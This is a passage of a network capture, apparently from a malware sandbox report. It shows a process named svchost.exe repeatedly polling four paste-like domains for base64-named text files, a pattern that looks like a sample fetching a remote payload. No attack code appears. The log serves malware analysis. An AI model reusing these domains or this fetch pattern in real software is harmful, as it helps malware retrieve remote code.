                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:48 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fjkz0MvZuLNH2HWfRPWv9E%2FNjMBkGLRM92n11QdgeiNsjH%2BmRa8hFE0aI4DkMeEGDMOL%2FUJNSPxnfObjkLY3t%2FoIMOmL%2FQTbH9%2FLw5jHIeQGuE9jddqG0mfOFvWgCd81G7Y%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3852a697c81-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1765&min_rtt=1765&rtt_var=882&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              17192.168.2.749935172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:48.654694080 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:49.128067970 CET858INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:49 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:49 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UWVcz1m3TYcY6Y9efDlwoWYbR%2Fy3jfa4lCGWjzBFTyZLzLcXur%2BBwkvvCoG7fQUwwVMUPaGEDandRyGqQ313qfzgyIakdA1pJhBLM8nH2SLdcWJtdDciNwKyb4A9zR55"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc388ab51424c-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1639&min_rtt=1639&rtt_var=819&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              18192.168.2.749943172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:49.134479046 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:49.595551968 CET880INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:49 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:49 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7emnElNfVm8u7LYCGyFIIjkn2dQ5%2FqK5gGzM7uCVfq%2BJIG9%2B%2B2CpwCyB59RSrM1aeU%2BDCRf%2BhgUWaJE0nGhVUA1ALJdY%2FcpuSWKTsERggtLCPY205dvCUxdVwuqfapZd97in"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc38b9dcc4233-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2135&min_rtt=2135&rtt_var=1067&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              19192.168.2.749945188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:49.369941950 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:49.841666937 CET876INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:49 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:49 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y2HkO39USwdxboF5Kpo4TMQAx9ldICZEqpdUaOsniVj4ZxektX6YY%2BDTx%2B2Y8i6kbPDmIn66808bbPuua7ffcxrU0oPCtw05%2BzvCOAjmO%2FdgmbTYavKs3ks%2FE8ttDO9UpoE%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc38d2f32c34f-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1598&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              20192.168.2.749947104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:49.602216005 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:50.062084913 CET879INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:50 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:50 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vjVs2XzsbWBRicf7l3QIpg%2FzgHwlJAmhYJVS3KqU7KyiEp3%2BnZAhbQfY%2BP7y04uUVtbDDCTX3UPvVC8AmDip9kL1CsqhQtPZdhIel0IIlil9C0%2FojD%2F0FnAodpQsyujRK2Z1"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc38e8a5142e9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1738&rtt_var=869&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              21192.168.2.749954172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:49.848090887 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:50.321182013 CET856INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:50 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:50 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bU9p3mYWq96Pp1J1ujo7l2jXPLECZcqxBau6Gn87Qgc2tszdHQF0TKu4EbIzd%2BHASSdYoz4RHaek1OBkqQouIpbBh3Ba7UIzeR0UmUn8KoiyoVurXcKj0N12xjHbgfQS"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc390298b8cad-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1930&min_rtt=1930&rtt_var=965&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              22192.168.2.749959172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:50.327678919 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:50.807281971 CET874INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:50 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:50 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OCifESbLHsLuau%2BInYLIBZSpwLRW5qA3GbL2jX0IV4EQ3Zw47%2BfaLpsWRg3wECWOvkybhzuRI2E%2FLdJXsau3KinupvWIr%2BM1mWyTS9lfD0gBSNQaPpyCrwRsbh4%2Frfu92zAm"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3932cb6437f-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1543&min_rtt=1543&rtt_var=771&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=77&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              23192.168.2.749966188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:50.554229975 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:51.016730070 CET874INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:50 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:50 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nwCewFZoBi9A4TusipxARyzmN%2BDXmZGRooq6J7gyRhW%2BeF2Qg7%2BZU1TIuBjPyjlk3xCOf3UwfuAru%2BkqJp4q6f1HUloa0ANrp793lZVlvIf6MmsKs8VZpCV9egX6pl45ha8%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3948a02c33d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1912&min_rtt=1912&rtt_var=956&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=136&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              24192.168.2.749968104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:50.813709974 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:51.290076971 CET881INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:51 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:51 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dH3TE3nKGsx1r%2BkyXiQVvfoKzJmAAPwAGtmnQGnPR91hjtpHZj4NtMK%2F642EX60oqHnwhpK%2FTMt0jb%2BauWYKGLl%2Bx5BmI4NLjufR5540MdF7BVpLoPq4J%2FgbP7EsDSa3xnyA"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc39638e742e9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1680&rtt_var=840&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              25192.168.2.749970172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:51.023252010 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:51.488451958 CET866INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:51 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:51 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1evzKecjjp67%2BPFhu54SI04Hjc4ynSLx8qSQOhXsZbwwCaymcJA%2BECGWkDYk%2BivC1nqP4fwrznmBoCvMDF9wULXI5fc%2BKXBl9BUglxG3y2WaKpC6vBliT%2BpLWWA%2FcqJa"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3977d5c43ed-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1645&rtt_var=822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              26192.168.2.749980172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:51.513422012 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:52.037334919 CET873INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:51 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:51 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ARGnsgCLBOmBWOXzzYlP%2BWykhr3ss7PQr1J6r0eh1xoOwXWdhbAn%2F6kizNTkzoYYiAY4WPnsC20cuR%2Fxpx70w91QkjbSBfpUCOgpzqz3lqoqs40h6CmaeeAZJWJ%2ByfbfvkG1"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc39ade3841d9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              27192.168.2.749982188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:51.832053900 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:52.293606043 CET870INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:52 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:52 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qH0aRKMuGD72pjJhrjXqraVLwguqGm581XQlaEjskP7rFwptW31Ub9wlX2TekZrqebivzSwamUTIzG14CZZQu6Yh88J1md7%2FzlDhOeFKzw4XjWOSc%2FWY699mMPN15JqPnBs%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc39c7f237d20-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1944&min_rtt=1944&rtt_var=972&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              28192.168.2.749984104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:52.067549944 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:52.532346010 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:52 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:52 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mN4pTVLRDpnUuXJfSSnK1SSSGYxKM9WGmZIe2owaLpor2y5M7cmDoUSw65sw0X5%2BHbo6QTdjl0sLyIsUAQTksZOBFPiT2mtp0xzlEnx1G3gBUPMU%2Fqbrznx6SZwtHt8Y%2FRAf"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc39dfdf2c358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1635&rtt_var=817&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              29192.168.2.749986172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:52.335328102 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:52.811049938 CET867INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:52 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:52 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCLw1s1MSU3ULatGBL0kfnrP0kuaKpdsoMSkQeHZ3%2B7V4qKW3coZJ%2B04S7TRfnw5he9U6%2F8O0UzbfGVX0i37syZtmfaSDzjrzIOf4A9%2FU%2BMpUtgX%2Fh9RYAT1jdvDjc7Z"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc39fbdc442aa-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2223&min_rtt=2223&rtt_var=1111&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              30192.168.2.749996172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:52.817740917 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:53.293430090 CET867INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:53 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:53 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V5SrXNB%2Bk8Al8M3b3AWxIzu1SDwSDPnNlaq0kAAV9HhsGUJVCPF4rOC1AB2DN59LTwpduOTYITNDM59YgBV3glvumDoh4teMYVAbvcze7U6dfxAn4IyYRvP9YuKk2G20lO3u"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3a2bb428c54-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1933&min_rtt=1933&rtt_var=966&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              31192.168.2.749998188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:53.013351917 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:53.497879982 CET868INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:53 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:53 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qELYdKYzbfXFy45SfJbV1eL4GFEqZOHYJzRaOaxlVlehtvcluYKvnIUmS9azkQUikNhO4WUXrjdewU05sn5uUDNEAJGeWNqfjaN2xfLhWNOMgig4h5E7hRpn1Pg7mMomZ%2FM%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3a3f9b25e65-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1561&rtt_var=780&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              32192.168.2.750005104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:53.299988031 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:53.768282890 CET883INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:53 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:53 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2BGmGsAiWrdFEy3NLH053iq9%2BOc0zYSS8NkvpTyvUP%2FQxNAMedCupdlAuEH2GtwNwZ7MS3bDq2hAwJlftIe7Uq%2F26YU49DT9qU42k5S%2BOo5q%2B97c5lt49lV7%2Bk2PKZgGXDzj"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3a5bb0b7c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1986&rtt_var=993&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              33192.168.2.750007172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:53.504475117 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:53.958750963 CET860INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:53 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:53 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouqNNvEZONHiyCLEmt8Pka9IL6k9nxO%2F3U9yxf7ODZhTuK99v7mHPfMl57ITHtouiddxQMEtZzhBcMv%2BENRVPwkavYdfjB%2FcIoq3I68Yj7xVge5teX4MTjnSh6nkxWdE"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3a6eeb943d7-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1750&min_rtt=1750&rtt_var=875&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              34192.168.2.750012172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:53.965317011 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:54.421447039 CET871INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:54 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
